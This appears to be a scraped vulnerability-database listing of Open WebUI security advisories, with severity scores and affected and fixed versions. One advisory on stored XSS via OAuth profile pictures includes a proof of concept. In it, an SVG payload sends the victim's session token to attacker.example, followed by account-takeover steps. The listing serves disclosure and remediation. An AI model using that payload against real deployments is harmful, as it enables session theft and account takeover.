scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:50:37Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp
fixed_packages
0
url pkg:pypi/open-webui@0.5.7
purl pkg:pypi/open-webui@0.5.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-6rbm-rm25-hqgy
18
vulnerability VCID-7j5a-pu4k-kucf
19
vulnerability VCID-7nbc-ng1s-suck
20
vulnerability VCID-8n6u-wgz9-1bgj
21
vulnerability VCID-8nzh-cpda-dkca
22
vulnerability VCID-8y4k-pj2n-8uhm
23
vulnerability VCID-94nj-qkdf-xfhn
24
vulnerability VCID-9jud-sr2a-8yc3
25
vulnerability VCID-chug-ma8r-cucc
26
vulnerability VCID-cw4k-3s8z-uqh8
27
vulnerability VCID-dz6g-jgmg-wqce
28
vulnerability VCID-dzh3-rqx4-fqhv
29
vulnerability VCID-ef1t-pxjm-j7cz
30
vulnerability VCID-gw77-ux3j-qfaa
31
vulnerability VCID-hj5f-yk3y-ffdg
32
vulnerability VCID-jfs9-dps1-27a2
33
vulnerability VCID-jnsg-u9dy-r3d5
34
vulnerability VCID-k17g-bd9g-67f7
35
vulnerability VCID-k9jf-5jzd-pkge
36
vulnerability VCID-mn21-kwuu-w7by
37
vulnerability VCID-n4ma-zcpv-5fbp
38
vulnerability VCID-nxvm-97r4-6ybz
39
vulnerability VCID-pkds-1xgn-q3bv
40
vulnerability VCID-pvep-chj7-ekeg
41
vulnerability VCID-pwsg-72yy-quhk
42
vulnerability VCID-q682-k826-efhv
43
vulnerability VCID-qgfh-7u8n-y7c7
44
vulnerability VCID-qjt1-zxx8-r7ht
45
vulnerability VCID-r7vt-4bqm-f7hb
46
vulnerability VCID-reqw-pfm8-c7g5
47
vulnerability VCID-rhhj-rccv-87hw
48
vulnerability VCID-s625-eg1w-gfd1
49
vulnerability VCID-t571-d65a-cyb2
50
vulnerability VCID-tz2k-gazs-mqgd
51
vulnerability VCID-u25g-p4nx-gqd1
52
vulnerability VCID-ujye-g4rj-8be5
53
vulnerability VCID-um53-kf7u-kkg6
54
vulnerability VCID-vghe-uuzj-m7cu
55
vulnerability VCID-vkx3-71kv-sugt
56
vulnerability VCID-w2vd-r3hr-w3bt
57
vulnerability VCID-wb88-83cj-ffhy
58
vulnerability VCID-wcz4-vwx4-tufb
59
vulnerability VCID-yug9-shts-kufb
60
vulnerability VCID-yysb-dk2k-f7g4
61
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.7
aliases CVE-2026-45345, GHSA-gm54-m39w-grjp
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9zyk-459z-x3a4
30
url VCID-chug-ma8r-cucc
vulnerability_id VCID-chug-ma8r-cucc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the _validate_collection_access function uses an incomplete allowlist that only enforces ownership checks for collections matching user-memory-* and file-* patterns. All other collection names pass through unchecked — including the system-level knowledge-bases meta-collection, which stores the IDs, names, and descriptions of every knowledge base on the instance. Any authenticated user can query this meta-collection directly via the retrieval query endpoints to obtain a global index of all knowledge bases across all users. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44557
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44557
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44557
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44557
3
reference_url https://github.com/advisories/GHSA-6c2x-gcp3-gp73
reference_id GHSA-6c2x-gcp3-gp73
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6c2x-gcp3-gp73
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6c2x-gcp3-gp73
reference_id GHSA-6c2x-gcp3-gp73
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:32:39Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6c2x-gcp3-gp73
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44557, GHSA-6c2x-gcp3-gp73
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-chug-ma8r-cucc
31
url VCID-cw4k-3s8z-uqh8
vulnerability_id VCID-cw4k-3s8z-uqh8
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45401
reference_id
reference_type
scores
0
value 0.00039
scoring_system epss
scoring_elements 0.12004
published_at 2026-06-14T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.11932
published_at 2026-06-11T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12023
published_at 2026-06-12T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12025
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45401
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45401
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45401
3
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
4
reference_url https://github.com/advisories/GHSA-rh5x-h6pp-cjj6
reference_id GHSA-rh5x-h6pp-cjj6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rh5x-h6pp-cjj6
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6
reference_id GHSA-rh5x-h6pp-cjj6
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:47:48Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45401, GHSA-rh5x-h6pp-cjj6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cw4k-3s8z-uqh8
32
url VCID-dz6g-jgmg-wqce
vulnerability_id VCID-dz6g-jgmg-wqce
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, his advisory tracks a regression of the original Excel-preview XSS (CVE-2026-44549). The same root cause — XLSX.utils.sheet_to_html() output rendered via {@html excelHtml} without DOMPurify — was reintroduced sometime after v0.8.0 and is exploitable again This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45318
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01755
published_at 2026-06-13T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01762
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01747
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01751
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45318
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45318
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45318
4
reference_url https://github.com/advisories/GHSA-hcwp-82g6-8wxc
reference_id GHSA-hcwp-82g6-8wxc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hcwp-82g6-8wxc
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hcwp-82g6-8wxc
reference_id GHSA-hcwp-82g6-8wxc
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:44:55Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hcwp-82g6-8wxc
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45318, GHSA-hcwp-82g6-8wxc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dz6g-jgmg-wqce
33
url VCID-dzh3-rqx4-fqhv
vulnerability_id VCID-dzh3-rqx4-fqhv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45398
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13438
published_at 2026-06-11T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13533
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13557
published_at 2026-06-12T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.1356
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45398
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45398
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45398
3
reference_url https://github.com/open-webui/open-webui/pull/22109
reference_id 22109
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/pull/22109
4
reference_url https://github.com/advisories/GHSA-4g37-7p2c-38r9
reference_id GHSA-4g37-7p2c-38r9
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4g37-7p2c-38r9
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9
reference_id GHSA-4g37-7p2c-38r9
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9
6
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.5
reference_id v0.9.5
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T16:01:45Z/
url https://github.com/open-webui/open-webui/releases/tag/v0.9.5
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45398, GHSA-4g37-7p2c-38r9
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dzh3-rqx4-fqhv
34
url VCID-ef1t-pxjm-j7cz
vulnerability_id VCID-ef1t-pxjm-j7cz
summary 
Open WebUI vulnerable to stored XSS via OAuth picture claim stored as SVG data URI in profile_image_url
# Summary

When a user signs in via OAuth, Open WebUI fetches the `picture` claim URL, infers a MIME type from the URL extension via `mimetypes.guess_type`, and stores `data:<mime>;base64,...` as the user's profile image. The OAuth code path does not go through the `validate_profile_image_url` Pydantic validator that normally restricts profile images to PNG/JPEG/GIF/WebP. A `.svg` URL in the `picture` claim lands in the database as `data:image/svg+xml;base64,...`.

The profile image endpoint `GET /api/v1/users/{id}/profile/image` returns the stored data URI with the attacker-controlled MIME type as `Content-Type` and `Content-Disposition: inline`. Security headers (CSP, `X-Content-Type-Options`) are env-gated and not set by default. An authenticated user navigating directly to that URL gets the SVG as a top-level document, executing `<script>`/`onload` in the same origin and able to read `localStorage.token` → account takeover.

Same class of trust-boundary error as CVE-2025-64496 (trust of untrusted model servers) and CVE-2025-64495 (rich-text XSS). Different sink, different code path.

# Details

## 1. MIME inferred from URL extension, not Content-Type

`backend/open_webui/utils/oauth.py:1336-1345` — `_process_picture_url`:

```python
response = await client.get(picture_url, ...)
if response.status_code == 200:
    picture = response.content
    base64_encoded_picture = base64.b64encode(picture).decode("utf-8")
    guessed_mime_type = mimetypes.guess_type(picture_url)[0]
    if guessed_mime_type is None:
        guessed_mime_type = "image/jpeg"
    return f"data:{guessed_mime_type};base64,{base64_encoded_picture}"
```

No MIME allowlist. The upstream `Content-Type` is ignored. For a URL ending in `.svg`, `mimetypes.guess_type` returns `image/svg+xml`.

## 2. OAuth path bypasses the profile-image validator

`backend/open_webui/utils/validate.py:10-36` defines `validate_profile_image_url`, which only accepts `/user.png`, `/user-mono.png`, and `data:image/{png,jpeg,gif,webp};base64,...`.

This validator is wired into Pydantic form models (`SignupForm`, `UpdateProfileForm`, `UserUpdateForm`), but the OAuth flow at `oauth.py:1536-1540` (existing-user login) and `oauth.py:1556-1574` (new-user signup) writes via `Users.update_user_profile_image_url_by_id` and `Auths.insert_new_auth`, both of which call SQLAlchemy directly (`models/users.py:575-588`) without going through any Pydantic model. The SVG data URI lands in the DB unchallenged.

## 3. Endpoint serves attacker-controlled MIME with `inline` disposition

`backend/open_webui/routers/users.py:504-528` — `get_user_profile_image_by_id`:

```python
header, encoded = image.split(",", 1)
media_type = header.split(";")[0].lstrip("data:")  # "image/svg+xml"
data = base64.b64decode(encoded)
return StreamingResponse(
    iter([data]),
    media_type=media_type,
    headers={"Content-Disposition": "inline"},
)
```

No MIME whitelist. The route requires `get_verified_user` — any authenticated user reaches it.

## 4. No default CSP / nosniff

`backend/open_webui/utils/security_headers.py:16-61` populates headers only when the operator sets the corresponding env var. The default deployment returns none of these. Browsers render a top-level `image/svg+xml` response as an XML document and execute embedded script.

# PoC

**Prerequisites**: operator has OAuth signup enabled (`ENABLE_OAUTH_SIGNUP=true`) or OAuth login with picture sync (`OAUTH_UPDATE_PICTURE_ON_LOGIN=true`). The attacker has a valid identity on the configured IdP and can set their profile picture URL.

1. Attacker hosts a malicious SVG at `https://attacker.example/p.svg`:

```xml
<svg xmlns="http://www.w3.org/2000/svg"
     onload="fetch('https://attacker.example/x?c='+encodeURIComponent(localStorage.getItem('token')))" />
```

2. Attacker sets their IdP profile picture to that URL and signs in to Open WebUI via OAuth. Signup (or login with picture sync) stores `data:image/svg+xml;base64,...` in the attacker's `profile_image_url`.

3. Attacker shares a link to their own profile image with a victim in a chat DM or channel:

```
https://target.example/api/v1/users/<attacker-user-id>/profile/image
```

4. The authenticated victim clicks the link. The browser receives `Content-Type: image/svg+xml` with `Content-Disposition: inline`, renders the SVG as a top-level document, fires `onload`, and exfiltrates the victim's JWT. Attacker uses the JWT to take over the victim's account.

# Impact

- Account takeover of any authenticated user who opens the crafted URL.
- Post-takeover: access to the victim's chats, API keys stored in their settings, and — if the victim has `workspace.tools` permission — RCE via installed tools (per CVE-2025-64496 analysis).
- The same `_process_picture_url` function has no SSRF allowlist; a secondary primitive is to point the `picture` claim at an internal URL (metadata service, internal admin panel) and read the response bytes via the profile image endpoint.

# Suggested fix

1. In `_process_picture_url` (`utils/oauth.py:1336-1345`): reject any MIME outside `{image/png, image/jpeg, image/gif, image/webp}`. Use the upstream `Content-Type` response header, not the URL extension. Also add an SSRF allowlist or at minimum block RFC1918 / link-local / loopback targets.

2. In `get_user_profile_image_by_id` (`routers/users.py:504-528`): enforce a MIME whitelist before building `StreamingResponse`. This is the defense-in-depth layer that should have caught the bypass.

3. Apply `validate_profile_image_url` at the model/storage layer (`Users.update_user_profile_image_url_by_id`), not only at the Pydantic form layer. All write paths to the profile image column should go through the same validator.

4. Set `X-Content-Type-Options: nosniff` and a default CSP unless the operator explicitly disables them.

# References

- `backend/open_webui/utils/oauth.py:1318-1351` — MIME guess + fetch
- `backend/open_webui/utils/oauth.py:1536-1574` — OAuth write path
- `backend/open_webui/utils/validate.py:10-36` — validator (bypassed)
- `backend/open_webui/models/users.py:575-588` — DB write
- `backend/open_webui/routers/users.py:504-528` — serving endpoint
- `backend/open_webui/utils/security_headers.py:16-61` — env-gated headers
- CVE-2025-64496 — precedent: trust boundary error (same class)
- CVE-2025-64495 — precedent: rich-text XSS (same class)
references
0
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
1
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q
2
reference_url https://github.com/advisories/GHSA-3wgj-c2hg-vm6q
reference_id GHSA-3wgj-c2hg-vm6q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3wgj-c2hg-vm6q
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases GHSA-3wgj-c2hg-vm6q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ef1t-pxjm-j7cz
35
url VCID-gw77-ux3j-qfaa
vulnerability_id VCID-gw77-ux3j-qfaa
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an iFrame with the allow-scripts allow-forms allow-same-origin sandbox directive. This means that the content is placed in a sandbox but with permission to execute scripts and access the parent’s data (e.g., local storage). As a result, only a few functions are restricted (e.g., displaying an alert box), but in effect, the sandbox attribute is largely nullified. This vulnerability is fixed in 0.6.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45303
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11107
published_at 2026-06-14T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11078
published_at 2026-06-11T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11139
published_at 2026-06-13T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11145
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45303
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45303
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45303
3
reference_url https://github.com/advisories/GHSA-4vrc-m9ch-6m3r
reference_id GHSA-4vrc-m9ch-6m3r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4vrc-m9ch-6m3r
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r
reference_id GHSA-4vrc-m9ch-6m3r
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:24:29Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r
fixed_packages
0
url pkg:pypi/open-webui@0.6.5
purl pkg:pypi/open-webui@0.6.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
